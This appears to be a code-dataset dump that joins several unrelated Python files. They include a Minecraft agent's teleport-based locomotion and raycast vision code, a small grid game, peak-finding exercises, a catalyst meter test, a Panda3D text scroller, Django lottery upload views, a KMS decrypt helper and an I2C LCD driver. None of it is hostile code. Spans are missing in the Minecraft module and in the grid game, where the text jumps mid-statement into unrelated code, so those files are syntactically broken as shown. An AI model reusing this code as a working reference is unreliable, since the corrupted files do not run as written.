'sleep'\n ]\n\n loco_node_template = {\n 'uid': \"\",\n 'name': \"\",\n 'x': 0,\n 'y': 0,\n 'z': 0,\n 'exit_one_uid': None,\n 'exit_two_uid': None,\n 'exit_three_uid': None,\n }\n\n loco_nodes = {}\n\n home_uid = tools.generate_uid()\n underground_garden_uid = tools.generate_uid()\n village_uid = tools.generate_uid()\n cathedral_uid = tools.generate_uid()\n summit_uid = tools.generate_uid()\n cloud_uid = tools.generate_uid()\n bungalow_uid = tools.generate_uid()\n farm_uid = tools.generate_uid()\n forest_uid = tools.generate_uid()\n desert_outpost_uid = tools.generate_uid()\n swamp_uid = tools.generate_uid()\n\n loco_nodes_indexes = [None, 'home', 'underground garden', 'village', 'cathedral', 'summit', 'cloud', 'bungalow', 'farm', 'forest', 'desert outpost', 'swamp']\n\n loco_nodes[home_uid] = loco_node_template.copy()\n loco_nodes[home_uid]['name'] = \"home\"\n loco_nodes[home_uid]['uid'] = home_uid\n loco_nodes[home_uid]['x'] = -105\n loco_nodes[home_uid]['y'] = 63\n loco_nodes[home_uid]['z'] = 59\n loco_nodes[home_uid]['exit_one_uid'] = cloud_uid\n loco_nodes[home_uid]['exit_two_uid'] = cathedral_uid\n loco_nodes[home_uid]['exit_three_uid'] = village_uid\n\n loco_nodes[underground_garden_uid] = loco_node_template.copy()\n loco_nodes[underground_garden_uid]['name'] = \"underground garden\"\n loco_nodes[underground_garden_uid]['uid'] = underground_garden_uid\n loco_nodes[underground_garden_uid]['x'] = -264\n loco_nodes[underground_garden_uid]['y'] = 62\n loco_nodes[underground_garden_uid]['z'] = 65\n loco_nodes[underground_garden_uid]['exit_one_uid'] = home_uid\n loco_nodes[underground_garden_uid]['exit_two_uid'] = village_uid\n\n loco_nodes[village_uid] = loco_node_template.copy()\n loco_nodes[village_uid]['name'] = \"village\"\n loco_nodes[village_uid]['uid'] = village_uid\n loco_nodes[village_uid]['x'] = -293\n loco_nodes[village_uid]['y'] = 64\n loco_nodes[village_uid]['z'] = -220\n loco_nodes[village_uid]['exit_one_uid'] = underground_garden_uid\n loco_nodes[village_uid]['exit_two_uid'] = home_uid\n\n loco_nodes[cathedral_uid] = loco_node_template.copy()\n loco_nodes[cathedral_uid]['name'] = \"cathedral\"\n loco_nodes[cathedral_uid]['uid'] = cathedral_uid\n loco_nodes[cathedral_uid]['x'] = -100\n loco_nodes[cathedral_uid]['y'] = 63\n loco_nodes[cathedral_uid]['z'] = 282\n loco_nodes[cathedral_uid]['exit_one_uid'] = home_uid\n loco_nodes[cathedral_uid]['exit_two_uid'] = cloud_uid\n loco_nodes[cathedral_uid]['exit_three_uid'] = bungalow_uid\n\n loco_nodes[summit_uid] = loco_node_template.copy()\n loco_nodes[summit_uid]['name'] = \"summit\"\n loco_nodes[summit_uid]['uid'] = summit_uid\n loco_nodes[summit_uid]['x'] = -233\n loco_nodes[summit_uid]['y'] = 102\n loco_nodes[summit_uid]['z'] = 307\n loco_nodes[summit_uid]['exit_one_uid'] = swamp_uid\n\n loco_nodes[cloud_uid] = loco_node_template.copy()\n loco_nodes[cloud_uid]['name'] = \"cloud\"\n loco_nodes[cloud_uid]['uid'] = cloud_uid\n loco_nodes[cloud_uid]['x'] = -98\n loco_nodes[cloud_uid]['y'] = 63\n loco_nodes[cloud_uid]['z'] = 198\n loco_nodes[cloud_uid]['exit_one_uid'] = home_uid\n loco_nodes[cloud_uid]['exit_two_uid'] = cathedral_uid\n\n loco_nodes[bungalow_uid] = loco_node_template.copy()\n loco_nodes[bungalow_uid]['name'] = \"bungalow\"\n loco_nodes[bungalow_uid]['uid'] = bungalow_uid\n loco_nodes[bungalow_uid]['x'] = 28\n loco_nodes[bungalow_uid]['y'] = 63\n loco_nodes[bungalow_uid]['z'] = 292\n loco_nodes[bungalow_uid]['exit_one_uid'] = cathedral_uid\n loco_nodes[bungalow_uid]['exit_two_uid'] = farm_uid\n\n loco_nodes[farm_uid] = loco_node_template.copy()\n loco_nodes[farm_uid]['name'] = \"farm\"\n loco_nodes[farm_uid]['uid'] = farm_uid\n loco_nodes[farm_uid]['x'] = -50\n loco_nodes[farm_uid]['y'] = 64\n loco_nodes[farm_uid]['z'] = 410\n loco_nodes[farm_uid]['exit_one_uid'] = bungalow_uid\n loco_nodes[farm_uid]['exit_two_uid'] = cathedral_uid\n loco_nodes[farm_uid]['exit_three_uid'] = forest_uid\n\n loco_nodes[forest_uid] = loco_node_template.copy()\n loco_nodes[forest_uid]['name'] = \"forest\"\n loco_nodes[forest_uid]['uid'] = forest_uid\n loco_nodes[forest_uid]['x'] = -273\n loco_nodes[forest_uid]['y'] = 65\n loco_nodes[forest_uid]['z'] = 782\n loco_nodes[forest_uid]['exit_one_uid'] = farm_uid\n loco_nodes[forest_uid]['exit_two_uid'] = desert_outpost_uid\n loco_nodes[forest_uid]['exit_three_uid'] = swamp_uid\n\n loco_nodes[desert_outpost_uid] = loco_node_template.copy()\n loco_nodes[desert_outpost_uid]['name'] = \"desert outpost\"\n loco_nodes[desert_outpost_uid]['uid'] = desert_outpost_uid\n loco_nodes[desert_outpost_uid]['x'] = -243\n loco_nodes[desert_outpost_uid]['y'] = 64\n loco_nodes[desert_outpost_uid]['z'] = 958\n loco_nodes[desert_outpost_uid]['exit_one_uid'] = forest_uid\n\n loco_nodes[swamp_uid] = loco_node_template.copy()\n loco_nodes[swamp_uid]['name'] = \"swamp\"\n loco_nodes[swamp_uid]['uid'] = swamp_uid\n loco_nodes[swamp_uid]['x'] = -529\n loco_nodes[swamp_uid]['y'] = 63\n loco_nodes[swamp_uid]['z'] = 504\n loco_nodes[swamp_uid]['exit_one_uid'] = forest_uid\n loco_nodes[swamp_uid]['exit_two_uid'] = summit_uid\n\n tp_tolerance = 5\n\n action_timeout = 10\n\n logger = None\n\n # specs for vision /fovea\n # focal length larger 0 means zoom in, smaller 0 means zoom out\n # ( small values of focal length distort the image if things are close )\n # image proportions define the part of the world that can be viewed\n # patch dimensions define the size of the sampled patch that's stored to file\n focal_length = 0.5 # distance of image plane from projective point /fovea\n max_dist = 64 # maximum distance for raytracing\n resolution = 1. # number of rays per tick in viewport /camera coordinate system\n im_width = 128 # width of projection /image plane in the world\n im_height = 64 # height of projection /image plane in the world\n cam_width = 1. # width of normalized device /camera /viewport\n cam_height = 1. # height of normalized device /camera /viewport\n patch_width = 32 # width of a fovea patch # 128\n patch_height = 32 # height of a patch # 64\n\n # Note: actors fov_x, fov_y and the saccader's gates fov_x, fov_y ought to be parametrized [0.,2.] w/ threshold 1.\n # -- 0. means inactivity, values between 1. and 2. are the scaled down movement in x/y direction on the image plane\n\n def __init__(self, world, uid=None, **data):\n super(MinecraftGraphLocomotion, self).__init__(world, uid, **data)\n\n self.datatarget_feedback = {\n 'orientation': 0,\n 'take_exit_one': 0,\n 'take_exit_two': 0,\n 'take_exit_three': 0,\n 'fov_x': 0,\n 'fov_y': 0,\n 'eat': 0,\n 'sleep': 0\n }\n\n self.datasources['health'] = 1\n self.datasources['food'] = 1\n self.datasources['temperature'] = 0.5\n self.datasources['hack_situation'] = -1\n self.datasources['hack_decay_factor'] = 1\n\n # a collection of conditions to check on every update(..), eg., for action feedback\n self.waiting_list = []\n\n self.target_loco_node_uid = None\n\n self.current_loco_node = None\n\n self.last_slept = None\n self.sleeping = False\n\n self.spockplugin = self.world.spockplugin\n self.waiting_for_spock = True\n self.logger = logging.getLogger(\"world\")\n self.spockplugin.event.reg_event_handler('PLAY 0. else 0.\n self.datasources['fov_y'] = self.datatargets['fov_y'] - 1. if self.datatargets['fov_y'] > 0. else 0.\n self.get_visual_input(self.datasources['fov_x'], self.datasources['fov_y'], self.current_loco_node['name'])\n # Note: saccading can't fail because fov_x, fov_y are internal actors, hence we return immediate feedback\n self.datatarget_feedback['fov_x'] = 1\n self.datatarget_feedback['fov_y'] = 1\n\n # health and food are in [0;20]\n self.datasources['health'] = self.spockplugin.clientinfo.health['health'] / 20\n self.datasources['food'] = self.spockplugin.clientinfo.health['food'] / 20\n if self.spockplugin.get_temperature() is not None:\n self.datasources['temperature'] = self.spockplugin.get_temperature()\n self.datasources['food_supply'] = self.spockplugin.count_inventory_item(297) # count bread\n\n # compute fatigue: 0.2 per half a day:\n # timeofday = self.spockplugin.world.time_of_day % 24000\n no_sleep = ((self.spockplugin.world.age - self.last_slept) // 3000) / 2\n fatigue = no_sleep * 0.2\n self.datasources['fatigue'] = fatigue\n\n self.check_for_action_feedback()\n\n # read locomotor values, trigger teleportation in the world, and provide action feedback\n # don't trigger another teleportation if the datatargets was on continuously, cf. pipe logic\n if self.datatargets['take_exit_one'] >= 1:\n # if the current node on the transition graph has the selected exit\n if self.current_loco_node['exit_one_uid'] is not None:\n self.register_action(\n 'take_exit_one',\n partial(self.locomote, self.current_loco_node['exit_one_uid']),\n partial(self.check_movement_feedback, self.current_loco_node['exit_one_uid'])\n )\n else:\n self.datatarget_feedback['take_exit_one'] = -1.\n\n if self.datatargets['take_exit_two'] >= 1:\n if self.current_loco_node['exit_two_uid'] is not None:\n self.register_action(\n 'take_exit_two',\n partial(self.locomote, self.current_loco_node['exit_two_uid']),\n partial(self.check_movement_feedback, self.current_loco_node['exit_two_uid'])\n )\n else:\n self.datatarget_feedback['take_exit_two'] = -1.\n\n if self.datatargets['take_exit_three'] >= 1:\n if self.current_loco_node['exit_three_uid'] is not None:\n self.register_action(\n 'take_exit_three',\n partial(self.locomote, self.current_loco_node['exit_three_uid']),\n partial(self.check_movement_feedback, self.current_loco_node['exit_three_uid'])\n )\n else:\n self.datatarget_feedback['take_exit_three'] = -1.\n\n if self.datatargets['eat'] >= 1:\n if self.has_bread() and self.datasources['food'] < 1:\n self.register_action(\n 'eat',\n self.spockplugin.eat,\n partial(self.check_eat_feedback, self.spockplugin.clientinfo.health['food'])\n )\n else:\n self.datatarget_feedback['eat'] = -1.\n\n if self.datatargets['sleep'] >= 1:\n if self.check_movement_feedback(self.home_uid) and self.spockplugin.world.time_of_day % 24000 > 12500:\n # we're home and it's night, so we can sleep now:\n self.register_action('sleep', self.sleep, self.check_waking_up)\n else:\n self.datatarget_feedback['sleep'] = -1.\n\n # impatience!\n self.check_for_action_feedback()\n\n def locomote(self, target_loco_node_uid):\n new_loco_node = self.loco_nodes[target_loco_node_uid]\n\n self.logger.debug('locomoting to %s' % new_loco_node['name'])\n\n self.spockplugin.chat(\"/tppos {0} {1} {2}\".format(\n new_loco_node['x'],\n new_loco_node['y'],\n new_loco_node['z']))\n\n self.target_loco_node_uid = target_loco_node_uid\n\n self.current_loco_node = new_loco_node\n\n def check_for_action_feedback(self):\n \"\"\" \"\"\"\n # check if any pending datatarget_feedback can be confirmed with data from the world\n if self.waiting_list:\n new_waiting_list = []\n for index, item in enumerate(self.waiting_list):\n if item['validation']():\n self.datatarget_feedback[item['datatarget']] = 1.\n else:\n new_waiting_list.append(item)\n\n self.waiting_list = new_waiting_list\n\n def register_action(self, datatarget, action_function, validation_function):\n \"\"\" registers an action to be performed by the agent. Will wait, and eventually re-trigger the action\n until the validation function returns true, signalling success of the action\"\"\"\n self.waiting_list.append({\n 'datatarget': datatarget,\n 'action': action_function,\n 'validation': validation_function,\n 'time': time.clock()\n })\n action_function()\n\n def has_bread(self):\n for item in self.spockplugin.inventory:\n if item.get('id', 0) == 297:\n return True\n return False\n\n def check_eat_feedback(self, old_value):\n food = self.spockplugin.clientinfo.health['food']\n return food > old_value or food == 20\n\n def check_movement_feedback(self, target_loco_node):\n if abs(self.loco_nodes[target_loco_node]['x'] - int(self.spockplugin.clientinfo.position['x'])) <= self.tp_tolerance \\\n and abs(self.loco_nodes[target_loco_node]['y'] - int(self.spockplugin.clientinfo.position['y'])) <= self.tp_tolerance \\\n and abs(self.loco_nodes[target_loco_node]['z'] - int(self.spockplugin.clientinfo.position['z'])) <= self.tp_tolerance:\n # hand the agent a bread, if it just arrived at the farm, or at the village\n if target_loco_node == self.village_uid or target_loco_node == self.farm_uid:\n self.spockplugin.give_item('bread')\n self.datasources['hack_situation'] = self.loco_nodes_indexes.index(self.loco_nodes[target_loco_node]['name'])\n return True\n return False\n\n def check_waking_up(self):\n \"\"\" Checks whether we're done sleeping.\n Sets the datatarget_feedback to 1 and returns True if so, False otherwise\"\"\"\n if not self.sleeping:\n self.datatarget_feedback['sleep'] = 1\n return True\n return False\n\n def sleep(self):\n \"\"\" Attempts to use the bed located at -103/63/59\"\"\"\n logging.getLogger('world').debug('going to sleep')\n data = {\n 'location': {\n 'x': -103,\n 'y': 63,\n 'z': 59\n },\n 'direction': 1,\n 'held_item': {\n 'id': 297,\n 'amount': 0,\n 'damage': 0\n },\n 'cur_pos_x': -103,\n 'cur_pos_y': 63,\n 'cur_pos_z': 59\n }\n self.spockplugin.net.push(Packet(ident='PLAY>Player Block Placement', data=data))\n\n def get_visual_input(self, fov_x, fov_y, label):\n \"\"\"\n Spans an image plane.\n\n Note that the image plane is walked left to right, top to bottom ( before rotation )!\n This means that fov__00_00 gets the top left pixel, fov__15_15 gets the bottom right pixel.\n \"\"\"\n from math import radians, tan\n\n # set agent position\n pos_x = self.spockplugin.clientinfo.position['x']\n pos_y = self.spockplugin.clientinfo.position['y'] + 0.620 # add some stance to y pos ( which is ground + 1 )\n pos_z = self.spockplugin.clientinfo.position['z']\n\n # set yaw and pitch ( in degrees )\n yaw = self.spockplugin.clientinfo.position['yaw']\n # consider setting yaw to a random value between 0 and 359\n pitch = self.spockplugin.clientinfo.position['pitch']\n\n # compute ticks per dimension\n tick_w = self.cam_width / self.im_width / self.resolution\n tick_h = self.cam_height / self.im_height / self.resolution\n\n # span image plane\n # the horizontal plane is split half-half, the vertical plane is shifted upwards\n h_line = [i for i in self.frange(pos_x - 0.5 * self.cam_width, pos_x + 0.5 * self.cam_width, tick_w)]\n v_line = [i for i in self.frange(pos_y - 0.05 * self.cam_height, pos_y + 0.95 * self.cam_height, tick_h)]\n\n # scale up fov_x, fov_y\n fov_x = round(fov_x * (self.im_width * self.resolution - self.patch_width))\n fov_y = round(fov_y * (self.im_height * self.resolution - self.patch_height))\n\n x0, y0, z0 = pos_x, pos_y, pos_z # agent's position aka projective point\n zi = z0 + self.focal_length\n\n v_line.reverse()\n\n # compute block type values for the whole patch /fovea\n patch = []\n for i in range(self.patch_height):\n for j in range(self.patch_width):\n try:\n block_type, distance = self.project(h_line[fov_x + j], v_line[fov_y + i], zi, x0, y0, z0, yaw, pitch)\n except IndexError:\n block_type, distance = -1, -1\n self.logger.warning(\"IndexError at (%d,%d)\" % (fov_x + j, fov_y + i))\n patch.append(block_type)\n\n # write block type histogram values to self.datasources['fov_hist__*']\n # for every block type seen in patch, if there's a datasource for it, fill it with its normalized frequency\n normalizer = self.patch_width * self.patch_height\n for bt in set(patch):\n name = \"fov_hist__%03d\" % bt\n if name in self.datasources:\n self.datasources[name] = patch.count(bt) / normalizer\n\n # normalize block type values\n # subtract patch mean\n mean = float(sum(patch)) / len(patch)\n patch_avg = [x - mean for x in patch]\n\n # truncate to +/- 3 standard deviations and scale to -1 and +1\n var = [x ** 2 for x in patch_avg]\n std = (sum(var) / len(var)) ** 0.5\n pstd = 3 * std\n # if block types are all the same number, eg. -1, std will be 0, therefore\n if pstd == 0:\n patch_std = [0 for x in patch_avg]\n else:\n patch_std = [max(min(x, pstd), -pstd) / pstd for x in patch_avg]\n\n # scale from [-1,+1] to [0.1,0.9] and write values to sensors\n patch_resc = [(1 + x) * 0.4 + 0.1 for x in patch_std]\n\n # write values to self.datasources['fov__']\n for i in range(self.patch_height):\n for j in range(self.patch_width):\n name = 'fov__%02d_%02d' % (i, j)\n self.datasources[name] = patch_resc[self.patch_height * i + j]\n\n def project(self, xi, yi, zi, x0, y0, z0, yaw, pitch):\n \"\"\"\n Given a point on the projection plane and the agent's position, cast a\n ray to find the nearest block type that isn't air and its distance from\n the projective plane.\n \"\"\"\n from math import sqrt\n\n distance = 0 # just a counter\n block_type = -1 # consider mapping nothingness to air, ie. -1 to 0\n\n # compute difference vector between projective point and image point\n diff = (xi - x0, yi - y0, zi - z0)\n\n # normalize difference vector\n magnitude = sqrt(diff[0] ** 2 + diff[1] ** 2 + diff[2] ** 2)\n if magnitude == 0.:\n magnitude = 1.\n norm = (diff[0] / magnitude, diff[1] / magnitude, diff[2] / magnitude)\n\n # rotate norm vector\n norm = self.rotate_around_x_axis(norm, pitch)\n norm = self.rotate_around_y_axis(norm, yaw)\n\n # rotate diff vector\n diff = self.rotate_around_x_axis(diff, pitch)\n diff = self.rotate_around_y_axis(diff, yaw)\n\n # add diff to projection point aka agent's position\n xb, yb, zb = x0 + diff[0], y0 + diff[1], z0 + diff[2]\n\n while block_type <= 0: # which is air and nothingness\n\n # check block type of next distance point along ray\n # aka add normalized difference vector to image point\n # TODO: consider a more efficient way to move on the ray, eg. a log scale\n xb += norm[0]\n yb += norm[1]\n zb += norm[2]\n\n block_type = self.spockplugin.get_block_type(xb, yb, zb)\n\n distance += 1\n if distance >= self.max_dist:\n break\n\n return block_type, distance\n\n def rotate_around_x_axis(self, pos, angle):\n \"\"\" Rotate a 3D point around the x-axis given a specific angle. \"\"\"\n\n # convert angle in degrees to radians\n theta = radians(angle)\n\n # rotate vector\n xx, y, z = pos\n yy = y * cos(theta) - z * sin(theta)\n zz = y * sin(theta) + z * cos(theta)\n\n return (xx, yy, zz)\n\n def rotate_around_y_axis(self, pos, angle):\n \"\"\" Rotate a 3D point around the y-axis given a specific angle. \"\"\"\n\n # convert angle in degrees to radians\n theta = radians(angle)\n\n # rotate vector\n x, yy, z = pos\n xx = x * cos(theta) + z * sin(theta)\n zz = - x * sin(theta) + z * cos(theta)\n\n return (xx, yy, zz)\n\n def rotate_around_z_axis(self, pos, angle):\n \"\"\" Rotate a 3D point around the z-axis given a specific angle. \"\"\"\n\n # convert angle in degrees to radians\n theta = radians(angle)\n\n # rotate vector\n x, y, zz = pos\n xx = x * cos(theta) - y * sin(theta)\n yy = x * sin(theta) + y * cos(theta)\n\n return (xx, yy, zz)\n\n def frange(self, start, end, step):\n \"\"\"\n Range for floats.\n \"\"\"\n while start < end:\n yield start\n start += step\n","sub_path":"micropsi_core/world/minecraft/minecraft_graph_locomotion.py","file_name":"minecraft_graph_locomotion.py","file_ext":"py","file_size_in_byte":27885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"12723839","text":"import random\n\nN= 3\ncounter = 0\na, b = -1, -1\ngrid = [['+' for x in range(N)] for y in range(N)]\n\n\n# This function prints the grid of Gomoku as the game progresses\ndef print_grid():\n print('--' + '---' * N + '--')\n for i in range(N):\n print(end='| ')\n for j in range(N):\n print(grid[i][j], end=' ')\n print(end='|')\n print()\n print('--' + '---' * N + '--')\n\n\n# This function checks if the game has a win state or not\ndef check_win():\n c = 0\n for i in range(N):\n for j in range(N):\n if grid[i][j] == '*':\n c+=1\n\n if c == 1:\n return True\n else:\n return False\n\n# This function checks if the game has a tie state or not for the given mark\ndef check_lose(i,j,a):\n if a == 0 or a == 1 or a == 2:\n grid[i][j]='X'\n return True\n else :\n return False\n\n\n\n# This function generates pac man\ndef generate_apple():\n global a\n a = random.randint(0, N**2)\n return a\n\n\ndef check_valid_index(i,j):\n return grid[i][j] == '*'\n\n# This function checks if given position is valid or not\ndef check_valid_position(i,j):\n\n valid = 0 <=i= 3:\n peaks = [x+1 for x,v in enumerate(nums[1:-1]) if v>nums[x] and v>nums[x+2]]\n if len(peaks)>0:\n peak = peaks[0]\n else:\n peak = nums.index(max(nums))\n return peak;\n\n\noutput = peak([1,2,3])\nprint(output)\n\n#%% try 2 faster than 74% and more ram efficient than 70.9%\n\ndef peak(nums):\n mn = max(nums)\n peak = nums.index(mn)\n for i in range(0,abs(min(nums)-max(nums))):\n maxind = nums.index((mn-i))\n if maxind < len(nums)-1:\n if nums[maxind-1]< ((mn-i)) and nums[maxind-1] < (mn-i):\n peak = maxind\n break\n else:\n peak = maxind\n break\n return peak\n \n\n\noutput = peak([1])\nprint(output)","sub_path":"Code Tests/find_peak.py","file_name":"find_peak.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"41166262","text":"import torch\n\nfrom catalyst.tools import meters\n\n\ndef test_averagevaluemeter():\n \"\"\"Test for ``catalyst.tools.meters.AverageValueMeter``.\"\"\"\n meter = meters.AverageValueMeter()\n\n def batch_generator(length, batch_size=10):\n data = torch.rand(length)\n for i in range(length // batch_size):\n yield data[i * batch_size : (i + 1) * batch_size]\n if length % batch_size:\n yield data[-(length % batch_size) :]\n\n def test(meter, length, batch_size):\n x2 = torch.zeros(length)\n i = 0\n for batch in batch_generator(length, batch_size):\n bs = batch.shape[0]\n meter.add(batch.mean(), bs)\n x2[i : i + bs] = batch.mean()\n i += bs\n assert torch.allclose(\n torch.tensor((x2.mean(), x2.std())), torch.tensor(meter.value())\n )\n meter.reset()\n\n confs = ((100, 1), (100, 10), (100, 16), (1024, 53), (10, 16), (100, 100))\n for conf in confs:\n test(meter, *conf)\n","sub_path":"catalyst/tools/meters/tests/test_averagevaluemeter.py","file_name":"test_averagevaluemeter.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"116797995","text":"from panda3d.core import loadPrcFileData\nloadPrcFileData('', 'sync-video f')\nloadPrcFileData('', 'show-frame-rate-meter f')\nloadPrcFileData('', 'win-size 800 600')\nloadPrcFileData('', 'window-title ')\nfrom direct.showbase.ShowBase import ShowBase\nfrom panda3d.core import *\nfrom direct.gui.OnscreenText import OnscreenText\nfrom direct.gui.DirectGui import *\nfrom direct.task import Task\nimport os\nbase = ShowBase()\nw, h = 800, 600\nprops = WindowProperties()\nprops.setSize(w, h)\nprops.setFixedSize(True)\nprops.setTitle(\"\")\nbase.win.requestProperties(props)\ntext = TextNode(\"node name\")\ntextNodePath = aspect2d.attachNewNode(text)\ntextNodePath.setScale(0.4)\ntextNodePath.setScale(1.3)\ntextNodePath.setPos(-10.6,30,0)\ntextNodePath.reparentTo(render)\ntext.setTextColor(1,1,1,1)\nfont = text.getFont()\ntext.setWordwrap(16.5)\nfont.setPixelsPerUnit(60)\ntext.setFont(font)\nbase.setBackgroundColor(0,0,0)\nbase.disableMouse()\ndef itemSel():\n textfile = open('test.txt')\n f=open(\"test.txt\", \"r\")\n b = f.read()\n text.setText(b)\n base.trackball.node().setPos(0, 0,6)\nitemSel()\ndef exampleTask(task):\n dt = globalClock.getDt()\n base.camera.setZ(base.camera, -2 * dt)\n return task.cont\ntaskMgr.doMethodLater(2, exampleTask, 'MyTaskName')\nbase.run()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"652770737","text":"from django.shortcuts import render\nfrom django.shortcuts import render_to_response, HttpResponse\nfrom django import template\nfrom django.forms import *\nfrom lots.models import Player\nimport base64\nimport random\nfrom datetime import datetime, timezone\n# Create your views here.\n\n\ndef login(request):\n\n return (render_to_response(\"login.html\", locals()))\n\n\ndef upload(request):\n #try:\n #由login頁面跳轉過來\n if request.method == \"GET\" and request.GET['sNum'] != \"\":\n #return HttpResponse(\"your series number is\" + \" \" + request.GET['sNum'] )\n seriesNumber = request.GET['sNum']\n\n\n return (render_to_response(\"home.html\", locals()))\n\n #接收表單並存到資料庫裡\n elif request.method == \"POST\":\n #request.POST['myImage']\n player = Player.objects.filter(name= request.POST['seriesNumber'])\n if len(player) != 0: \n #print(\"上傳時間=\", player[0].loginTime, player[0].name) \n if (datetime.now(timezone.utc) - player[0].loginTime ).seconds <= 30*60:\n print((datetime.now(timezone.utc) -player[0].loginTime ).seconds)\n player.update(image=request.POST['myImage'])\n return HttpResponse(\"Update Success! \" )\n else:\n return HttpResponse(\"您已經超過上傳時間30分鐘!\" )\n\n \n else:\n player = Player(name =request.POST['seriesNumber'], image=request.POST['myImage'])\n player.save()\n return HttpResponse(\"Upload Success! \" )\n \n \n #return (render_to_response(\"result.html\", locals()))\n\n else:\n return (render_to_response(\"home.html\", locals()))\n\n #except:\n #return HttpResponse(\"Sorry! you don't have access to this page\" )\n\n\n\n\n\ndef result(request):\n\n #列出所有玩家\n player = Player.objects.all()\n print(\"所有玩家\", player)\n\n #列出所有沒中獎的玩家\n players = Player.objects.filter(hit= False)\n print(\"沒中獎的倒楣鬼\" , players)\n\n hitJackPlayers = Player.objects.filter(hit= True)\n print(\"中獎的幸運兒\" , hitJackPlayers)\n\n if len(players) > 1:\n numbers = len(players)\n hitJack = players[random.randint(0, numbers)]\n print(hitJack.name)\n hitJack.hit = True\n hitJack.save()\n\n hitJackPlayers = Player.objects.filter(hit= True)\n print(\"中獎的幸運兒\" , hitJackPlayers)\n return (render_to_response(\"result.html\", locals()))\n\n elif len(players) == 1:\n numbers = 1\n hitJack = players[0]\n print(hitJack.name)\n hitJack.hit = True\n hitJack.save()\n\n return (render_to_response(\"result.html\", locals()))\n\n else:\n return (HttpResponse(\"No players in the pool\" ))\n\n\n\n\n","sub_path":"lots/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2620,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"463998007","text":"import base64\nimport botocore.session\n\n\ndef kms_simple_decrypt(value):\n \"\"\"Decrypt the specified value with a master key in KMS.\n\n kmssimple field types should be in the following format:\n\n [@]\n\n Note: The region is optional, and defaults to us-east-1 if not given.\n\n For example:\n\n # We use the aws cli to get the encrypted value for the string\n # \"PASSWORD\" using the master key called 'myStackerKey' in us-east-1\n $ aws --region us-east-1 kms encrypt --key-id alias/myStackerKey \\\n --plaintext \"PASSWORD\" --output text --query CiphertextBlob\n\n CiD6bC8t2Y<...encrypted blob...>\n\n # In stacker we would reference the encrypted value like:\n conf_key: !kms us-east-1@CiD6bC8t2Y<...encrypted blob...>\n\n # The above would resolve to\n conf_key: PASSWORD\n \"\"\"\n region = 'us-east-1'\n if '@' in value:\n region, value = value.split('@', 1)\n\n s = botocore.session.get_session()\n kms = s.create_client('kms', region_name=region)\n decoded = base64.b64decode(value)\n response = kms.decrypt(CiphertextBlob=decoded)\n return response[\"Plaintext\"]\n\n\ndef kms_simple_constructor(loader, node):\n value = loader.construct_scalar(node)\n return kms_simple_decrypt(value)\n","sub_path":"stacker/config/translators/kms.py","file_name":"kms.py","file_ext":"py","file_size_in_byte":1308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"248591978","text":"import time\n\n# Define some device parameters\ntry:\n from config.lcd_conf import *\n from config.i2c_conf import *\n# logging.info(\"Using external configs.\")\n\nexcept ImportError:\n import smbus\n \n LCD_ADDR = 0x3f # Define device address if not defined external\n\n LCD_CMD = 0 # Sending commands\n LCD_CHR = 1 # Sending characters\n\n LCD_WIDTH = 20 # Character per line\n LCD_LINES = 4 # Number of lines\n\n E_PULSE = 0.0005 # Pulse timing constant\n E_DELAY = 0.0005 # Delay timing constant\n\n T_LINE = 0.6 # Time to display a line\n \n bus = smbus.SMBus(1) # Open I2C interface\n\n# logging.info(\"Using internal configs, no external config file found.\")\n\n\nclass I2CDisplay:\n def __init__(self):\n # Initialise display\n self.byte(0x33, LCD_CMD) # 110011 Initialise\n self.byte(0x32, LCD_CMD) # 110010 Initialise\n self.byte(0x06, LCD_CMD) # 000110 Cursor move direction\n self.byte(0x0C, LCD_CMD) # 001100 Display On,Cursor Off, Blink Off \n self.byte(0x28, LCD_CMD) # 101000 Data length, number of lines, font size\n self.clear()\n time.sleep(E_DELAY)\n\n def __del__(self):\n self.clear()\n self.string(\"Goodbye!\", 1, 2)\n time.sleep(1)\n self.clear()\n\n def clear(self):\n self.byte(0x01, LCD_CMD)\n\n def byte(self, bits, mode, backlight = 1):\n # Send byte to data pins\n # bits = the data\n # mode = 1 for data\n # 0 for command\n\t \n light = 0x08 if backlight == 1 else 0x00 # Turns the LCD Backlight on/off\n\n bits_high = mode | (bits & 0xF0) | light\n bits_low = mode | ((bits<<4) & 0xF0) | light\n\n # High bits\n bus.write_byte(LCD_ADDR, bits_high)\n self.t_enable(bits_high)\n\n # Low bits\n bus.write_byte(LCD_ADDR, bits_low)\n self.t_enable(bits_low)\n\n def t_enable(self, bits):\n # Toggle enable\n time.sleep(E_DELAY)\n bus.write_byte(LCD_ADDR, (bits | ENABLE))\n time.sleep(E_PULSE)\n bus.write_byte(LCD_ADDR,(bits & ~ENABLE))\n time.sleep(E_DELAY)\n\n def custom_chars(self, message):\n message = message.replace('°', '\\0')\n message = message.replace('^', '\\1')\n message = message.replace('ß', '\\2')\n message = message.replace('µ', '\\3')\n message = message.replace('€', '\\4')\n message = message.replace('~', '\\u00ff')\n return message\n\n def write(self, message):\n for i in range(len(message)):\n self.byte(ord(message[i]), LCD_CHR)\n\n def string(self, message, line, style = 0, offset = 0, limit = LCD_WIDTH):\n # Send string to display\n # style=1 Left justified\n # style=2 Centred\n # style=3 Right justified\n\n message = self.custom_chars(message.strip())\n\t \n if style == 1:\n message = message.ljust(LCD_WIDTH)\n elif style == 2:\n message = message.center(LCD_WIDTH)\n elif style == 3:\n message = message.rjust(LCD_WIDTH)\n\n pos = LCD_LINE[line-1] + offset\n \n self.byte(pos, LCD_CMD)\n self.write(message[:limit]) \n\n # \"Laufschrift\", abcde --> bcde --> cde --> de --> e\n if len(message) > limit:\n self.byte(pos, LCD_CMD)\n time.sleep(T_LINE)\n for i in range(len(message) + 1 - limit):\n to_print = message[i:limit+i]\n if len(to_print) < limit:\n to_print += ((limit - len(to_print)) * ' ')\n \n self.write(to_print)\n 